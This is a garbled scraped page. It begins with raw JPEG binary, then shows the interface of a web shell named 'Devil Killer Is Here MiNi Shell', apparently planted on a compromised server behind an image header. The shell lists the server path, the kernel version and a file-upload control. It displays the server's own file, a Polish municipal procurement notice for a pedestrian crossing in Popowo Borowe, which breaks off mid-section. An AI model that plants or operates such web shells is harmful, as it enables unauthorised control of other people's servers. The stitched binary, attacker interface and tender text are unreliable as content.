JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211109/0026293801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa bezpieczeństwa ruchu drogowego na 1 przejściu dla pieszych w Popowie Borowym na drodze nr 240306W – zaprojektuj i wybuduj </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA NASIELSK</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Inwestycji, Zamówień Publicznych i Programów Strukturalnych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130377899</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Elektronowa 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nasielsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-190</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@nasielsk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.nasielsk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa bezpieczeństwa ruchu drogowego na 1 przejściu dla pieszych w Popowie Borowym na drodze nr 240306W – zaprojektuj i wybuduj </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d91e7c65-4147-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00262938</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001844/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.12 Poprawa bezpieczeństwa ruchu drogowego na 1 przejściu dla pieszych w Popowie Borowym na drodze nr 240306W – zaprojektuj i wybuduj</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/nasielsk/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/nasielsk/proceedings<br/>2. W celu skrócenia czasu udzielenia odpowiedzi na pytania komunikacja między zamawiającym a<br/>wykonawcami odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do<br/>zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji<br/>przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku<br/>„Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została<br/>wysłana do zamawiającego.<br/>adres strony internetowej<br/>~https://platformazakupowa.pl/pn/nasielsk</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wymagania techniczne:1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 512 kb/s,2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB<br/>Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS<br/>Windows7, Mac Os x 10 4, Linux, lub ich nowsze wersje,3) zainstalowana dowolna przeglądarka<br/>internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,4) włączona obsługa<br/>JavaScript,5)zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,6)<br/>Szyfrowanie<br/>na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.7) Oznaczenie czasu odbioru<br/>danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. 2.Zamawiający<br/>rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>3.W celuewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z<br/>formatów:a. .zip b. .7Z4. Wśród formatów powszechnych a NIE występujących w rozporządzeniu<br/>występują: .rar .gif .bmp .numbers .pages. 5. Oferta, wniosek oraz przedmiotowe środki dowodowe<br/>składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub<br/>podpisem zaufanym lub podpisem osobistym. W procesie składania oferty, wniosku w tym<br/>przedmiotowych środków<br/>dowodowych na platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty<br/>Wykonawca składa bezpośrednio na dokumencie, który następnie przesyła do systemu.6.<br/>Poświadczenia za zgodność z oryginałem dokonuje odpowiednio wykonawca, podmiot, na którego<br/>zdolnościach lub sytuacji polega wykonawca, wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą.<br/>Poprzez oryginał należy rozumieć dokument podpisany kwalifikowanym podpisem elektronicznym lub<br/>podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione.<br/>Poświadczenie za zgodność z oryginałem następuje w formie elektronicznej podpisane kwalifikowanym<br/>podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby<br/>upoważnioną/upoważnione. 7.Ofertę wraz z wymaganymi dokumentami należy umieścić na<br/>platformazakupowa.pl pod adresem:https://platformazakupowa.pl/pn/nasielsk/proceedings w myśl<br/>Ustawy na stronie internetowej prowadzonego postępowania do dnia składania ofert. 8.Za datę<br/>złożenia oferty przyjmuje się datę jej przekazania w systemie (platformie) w drugim kroku składania<br/>oferty poprzez kliknięcie przycisku “Złóż ofertę” i wyświetlenie się komunikatu, że oferta została<br/>zaszyfrowana i złożona.Szczegółowa instrukcja dla Wykonawców dotycząca złożenia, zmiany i<br/>wycofania oferty znajduje się na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z późn.<br/>zm. z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1. Administratorem danych osobowych przekazanych w niniejszym postepowaniu jest Gmina Nasielsk<br/>reprezentowana przez Burmistrza Nasielska, ul. Elektronowa 3, 05-190 Nasielsk, um@nasielsk.pl.<br/>2. Więcej informacji dot. przetwarzania danych osobowych można uzyskać od Inspektora Ochrony<br/>Danych Osobowych za pośrednictwem poczty elektronicznej, adres e-mail: iod@nasielsk.pl.<br/>3. Dane osobowe będą przetwarzane w celu realizacji zadań ustawowych Gminy (art. 6 ust. 1 lit. c<br/>RODO), podjęcia czynności przed zawarciem umowy (art. 6 ust. 1 lit. b RODO) związanych z<br/>prowadzeniem postępowania o udzielenie zamówienia publicznego i wynikających z przepisów<br/>obowiązującego prawa, w tym z ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych<br/>(dalej jako „ustawa Pzp”.)<br/>4. Odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp. Pana/Pani<br/>dane osobowe mogą być przekazywane innym, współpracującym z Gminą Nasielsk podmiotom, w tym:<br/>dostawcom usług technicznych, organizacyjnych i prawnych, umożliwiającym prawidłowe zarządzanie<br/>gminą oraz realizację zadań statutowych i ustawowych. Dane te powierzane są na podstawie i zgodnie<br/>z obowiązującymi przepisami. Wyniki przeprowadzonego postępowania mogą być opublikowane w<br/>Urzędzie Miejskim w Nasielsku oraz w Biuletynie Informacji Publicznej Urzędu Miejskiego w Nasielsku.<br/>5. Dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres<br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje czas trwania umowy oraz okres przedawnienia<br/>roszczeń.<br/>6. Obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp; .<br/>7. Wykonawca posiada:<br/>a. na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>b. na podstawie art. 16 RODO prawo do sprostowania danych osobowych. Skorzystanie przez osobę,<br/>której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art.<br/>16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie<br/>niezgodnym z ustawą<br/>c. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania,<br/>o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia tego postępowania.<br/>d. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca<br/>uzna, że przetwarzanie jego danych osobowych dotyczących narusza przepisy RODO.<br/>8. Wykonawcy nie przysługuje:<br/>a. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.271.29.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest realizacja w trybie &#34;zaprojektuj i wybuduj&#34;, inwestycji<br/>polegającej na budowie przejścia dla pieszych bezpośrednio przy wejściu na teren do Szkoły<br/>Podstawowej w Popowie Borowym, wraz z przebudową drogi na odcinku 100m,<br/>umiejscowionego w ciągu drogi gminnej nr 240306W, według wymagań szczegółowo<br/>określonych w Programie Funkcjonalno – Użytkowym – zwanym dalej PFU ( Załącznik nr 9 do<br/>SWZ).<br/>2. W zakresie przedmiotu zamówienia należy wykonać:<br/>1) projekt zagospodarowania terenu,<br/>2) wielobranżowy projekt architektoniczno-budowlany oraz projekt techniczny wraz z<br/>kosztorysami i przedmiarami robót (drogowa, elektryczna - oświetlenie uliczne, odwodnienie,<br/>itp.),<br/>3) uzyskanie wszelkich wymaganych uzgodnień, opinii i pozwoleń wymaganych przepisami<br/>prawa,<br/>4) opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych,<br/>5) uzyskanie decyzji o pozwoleniu na budowę lub dokonanie zgłoszenia robót budowlanych,<br/>6) uzyskanie ewentualnych dodatkowych zgód, pozwoleń, warunków technicznych, innych<br/>materiałów - jeśli w trakcie opracowywania dokumentacji lub realizacji inwestycji stanie się to<br/>konieczne,<br/>7) przejęcie i organizacja placu budowy;<br/>8) budowa bezpiecznego przejścia dla pieszych wraz przebudową drogi gminnej (na podstawie<br/>opracowanej i zatwierdzonej przez Zamawiającego dokumentacji projektowej) wraz z niezbędną<br/>infrastrukturą i zagospodarowaniem terenu,<br/>9) sprawowanie nadzoru autorskiego w trakcie prowadzenia robót,<br/>10) uprzątnięcie terenu i likwidacja placu budowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233261-6 - Roboty budowlane w zakresie przejść dla pieszych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34922100-7 - Oznakowanie drogowe</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233280-5 - Wznoszenie barier drogowych</p> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie określa warunku w ww. zakresie<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie określa warunku w ww. zakresie<br/>4) zdolności technicznej lub zawodowej.<br/>a)zdolność techniczna:<br/>Wykonawca spełni warunek udziału w postępowaniu, jeżeli wykaże, że wykonał należycie nie<br/>wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną robotę<br/>budowlaną obejmującą swoim zakresem przynajmniej budowę, rozbudowę lub remont drogi o<br/>nawierzchni bitumicznej wraz z wykonaniem przejścia dla pieszych;<br/>b)zdolność zawodowa:<br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował<br/>osobami zdolnymi do wykonania zamówienia tj.: osobę posiadającą uprawnienia wymagane<br/>przez prawo do kierowania budową lub innymi robotami budowlanymi w specjalności<br/>inżynieryjnej drogowej Zamawiający, określając wymogi dla osoby w zakresie posiadanych<br/>uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały<br/>wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia<br/>wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji<br/>Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (tj. Dz.<br/>U. z 2020.0.1333 z późn. zm.), a także ustawy o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (tj. Dz. U. z 2020 poz. 2020). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) odpis z właściwego rejestru lub z centralnej ewidencji i informacji<br/>o działalności gospodarczej, w celu potwierdzenia braku podstaw<br/>do wykluczenia w zakresie art. 109 ust. 1 pkt 4 ustawy sporządzonych nie wcześniej niż 3 miesiące<br/>przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,;<br/>b) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2019 r. poz. 369), z innym Wykonawca, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 6 do SWZ;<br/>c) informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust. 1 pkt 1, 2, 4 ustawy,<br/>sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie 5 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których<br/>roboty te zostały wykonane - wg. wzoru Załącznik Nr 4 do SWZ, zgodnie z wymaganiami warunków<br/>udziału w postępowaniu, wraz z załączeniem dowodów określających czy te roboty budowlane zostały<br/>wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w<br/>stanie uzyskać tych dokumentów – inne dokumenty.<br/>b) Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – wg wzoru Załącznik<br/>Nr 5, zgodnie z wymaganiami zawartymi w SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje 